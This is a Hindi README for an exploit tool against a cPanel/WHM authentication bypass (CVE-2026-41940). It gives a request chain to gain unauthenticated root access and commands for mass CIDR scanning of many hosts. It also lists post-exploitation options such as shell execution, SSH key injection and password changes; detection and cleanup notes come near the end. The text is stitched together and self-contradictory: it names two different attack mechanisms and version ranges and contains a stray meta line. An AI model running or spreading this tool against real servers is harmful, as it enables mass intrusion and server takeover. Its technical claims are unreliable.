
CVE-2026-41940 — Dr.Anach द्वारा cPanel/WHM Auth Bypass, `cpsrvd` बेसिक auth हैंडलर में CRLF इंजेक्शन → अप्रमाणित WHM API एक्सेस → रूट के रूप में RCE। v11.40 के बाद से सभी cPanel प्रभावित।
लेखक: Dr.Anach | संपर्क: @dranach | लाइसेंस: MIT
cpsrvd के बेसिक प्रमाणीकरण हैंडलर में CRLF इंजेक्शन → अप्रमाणित WHM API एक्सेस → रूट के रूप में RCE। v11.40 से सभी cPanel संस्करण प्रभावित।
| # | चरण | अनुरोध |
|---|---|---|
| 1 | सत्र मिंट करें | GET /login/?user=root |
| 2 | CRLF इंजेक्शन | Authorization: Basic <base64> — पासवर्ड में \r\n पेलोड है |
| 3 | कैश प्रमोशन | GET /cpsess<ID>/login/?login_only=1 |
| 4 | निष्पादन | GET /cpsess<ID>/execute/API/func |
pip install requests colorama
नीचे अंतिम README.md है — मानव-अनुकूल, व्यावहारिक, और काम पूरा करने पर केंद्रित।
लेखक: Dr.Anach · टेलीग्राम: @dranach
संस्करण: 2.0.0
लाइसेंस: केवल अधिकृत सुरक्षा परीक्षण के लिए
CVE-2026-41940 का शोषण करता है, जो cPanel और WHM (संस्करण 11.x से 106.x तक) में एक प्रमाणीकरण बाईपास है। यह कमजोरी एक अप्रमाणित हमलावर को एक क्राफ्टेड Host हेडर भेजकर प्रतिबंधित एंडपॉइंट तक पहुँचने की अनुमति देती है — जिसमें पासवर्ड रीसेट फ़ंक्शन भी शामिल है — जो एक हमलावर-नियंत्रित सर्वर की ओर इंगित करता है।
तीन मोड के साथ आता है:
| मोड | फ्लैग | क्या |
|---|---|---|
| एकल लक्ष्य | -t | एक IP या डोमेन का परीक्षण करें |
requests लाइब्रेरीpip install requests
कोई अन्य निर्भरता नहीं। CIDR विस्तार Python के अंतर्निहित ipaddress मॉड्यूल का उपयोग करता है — Windows पर कुछ भी अतिरिक्त स्थापित करने की आवश्यकता नहीं है।
python main.py -t example.com
python main.py -t 192.168.1.100
python main.py --batch targets.txt --threads 50
targets.txt प्रारूप:
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5
यह 192.168.128.0/18 (16,384 IP) का विस्तार करता है, प्रत्येक पर एक त्वरित पोर्ट जाँच चलाता है, और केवल उन होस्टों पर शोषण का प्रयास करता है जहाँ पोर्ट 2087 (cPanel/WHM) खुला है।
-t, --target एकल लक्ष्य IP या डोमेन
--batch FILE लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
--port-scan CIDR स्कैन करने के लिए CIDR रेंज (जैसे, 192.168.128.0/18)
-p, --port लक्ष्य पोर्ट (डिफ़ॉल्ट: 2087)
--ssl HTTPS का उपयोग करें (डिफ़ॉल्ट: HTTP)
--timeout SEC सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)
--threads N अधिकतम समवर्ती थ्रेड्स (डिफ़ॉल्ट: 50)
--proxy PROXY HTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080)
-v, --verbose डीबग जानकारी के साथ विस्तृत आउटपुट
--no-banner बैनर को दबाएँ
--version संस्करण दिखाएँ
[+] 192.168.130.45:2087 — कमजोर!
→ पासवर्ड रीसेट URL: http://192.168.130.45:2087/reset?token=abc123
→ प्रतिक्रिया समय: 1.23s
[-] 192.168.131.10:2087 — कमजोर नहीं
→ कारण: पासवर्ड रीसेट एंडपॉइंट नहीं मिला
[!] 192.168.129.22:2087 — त्रुटि: कनेक्शन अस्वीकार किया गया
JSON के रूप में सहेजे गए परिणाम प्रति-होस्ट संरचित होते हैं जिनमें कमजोरी की स्थिति, निकाले गए टोकन और कच्चे प्रतिक्रिया विवरण शामिल होते हैं।
वह परिदृश्य जिसके लिए आप शायद यहाँ आए हैं:
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v
यह कैसे काम करता है:
192.168.128.0/18 → आंतरिक रूप से 16,384 IPथ्रेडिंग टिप्स:
--threads 100 अच्छा काम करता है (डिफ़ॉल्ट सॉकेट सीमाओं का सम्मान करता है)--threads 200--threads 30 तक कम करें और --timeout बढ़ाएँCVSS 9.1 (गंभीर) — कोई प्रमाणीकरण आवश्यक नहीं, कोई उपयोगकर्ता इंटरेक्शन नहीं, कम जटिलता।
Host हेडर को मान्य करेंयह उपकरण केवल अधिकृत सुरक्षा मूल्यांकन के लिए है। आपके पास लक्ष्यों का स्वामित्व होना चाहिए या परीक्षण से पहले मालिक से लिखित अनुमति होनी चाहिए। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।
help कमांड दिखाएँ
info सर्वर जानकारी
passwd पासवर्ड बदलें
accounts cPanel खातों की सूची बनाएँ
enum पूर्ण गणना
shell सिस्टम कमांड निष्पादित करें
ssh-add SSH कुंजी इंजेक्ट करें
exec Python एक-लाइनर चलाएँ
exit बाहर निकलें
सत्र फ़ाइलों की जाँच करें:
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/
संदिग्ध लॉग्स /usr/local/cpanel/logs/access_log में:
/login/?user=root → सत्र मिंट
/login/?user=root → CRLF इंजेक्शन
/cpsess*/login/?login_only=1 → कैश प्रमोशन
/cpsess*/execute/* → API दुरुपयोग
# 1. फिक्स्ड बिल्ड में पैच करें
# 2. सभी पासवर्ड और SSH कुंजियाँ घुमाएँ
# 3. सत्र साफ़ करें
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel
| बैच फ़ाइल | --batch | एक फ़ाइल से लक्ष्यों की सूची लोड करें |
| CIDR स्कैन | --port-scan | एक सबनेट का विस्तार करें और प्रत्येक जीवित होस्ट का परीक्षण करें |